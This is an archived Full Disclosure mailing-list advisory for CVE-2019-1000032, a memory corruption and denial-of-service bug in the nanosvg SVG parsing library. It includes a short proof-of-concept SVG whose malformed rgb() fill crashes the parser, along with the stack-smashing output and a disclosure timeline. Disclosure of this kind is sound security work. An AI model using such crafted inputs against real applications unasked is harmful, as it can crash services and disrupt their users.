[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] CVE-2019-1000032: Memory corruption / DoS in nanosvg

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] CVE-2019-1000032: Memory corruption / DoS in nanosvg
From: Sebastian Neef <contact@xxxxxxxxx>
Date: Sun, 24 Feb 2019 18:37:01 +0100

The SVG library nanosvg [0] suffers from a memory corruption bug that can lead 
to at least DoS. 

The bug exists in the `nsvg__parseColorRGB` function, which can be reached by 
parsing a malicious SVG file through `nsvgParseFromFile`  or `nsvgParse`. This 
should also affect libraries/packages that provide bindings to nanosvg, for 
example:

- Lua: https://github.com/iongion/lunavg
- Python: https://github.com/ethanhs/pynanosvg
- Java: https://javalibs.com/artifact/org.lwjgl/lwjgl-nanovg
- Rust: https://crates.rs/crates/nsvg

More information available in the issue [1] and the blogpost [2].

# PoC 

> <svg>
>       <circle 
> fill="rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)"/>
> </svg>

> $> ./test poc.svg
> *** stack smashing detected ***: <unknown> terminated
> fish: “./test poc.svg” terminated by signal SIGABRT (Abort)

# Timeline 
- Late 2018 bug discovered by Sebastian Neef using AFL
- 16th Nov 2018 opened issue [1]
- 19th Feb 2019 CVE assigned by DWF
- 24th Feb 2019 blogpost [2] and email published


[0] https://github.com/memononen/nanosvg
[1] https://github.com/memononen/nanosvg/issues/136
[2] https://0day.work/cve-2019-1000032-memory-corruption-in-nanosvg/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] CVE-2019-8939: XSS in Tautulli
Next by Date: [FD] [CVE-2019-9083] Blind SQL injection in SQLiteManager 1.2.0 (and 1.2.4)
Previous by thread: [FD] CVE-2019-8939: XSS in Tautulli
Next by thread: [FD] [CVE-2019-9083] Blind SQL injection in SQLiteManager 1.2.0 (and 1.2.4)
Index(es):
- Date
- Thread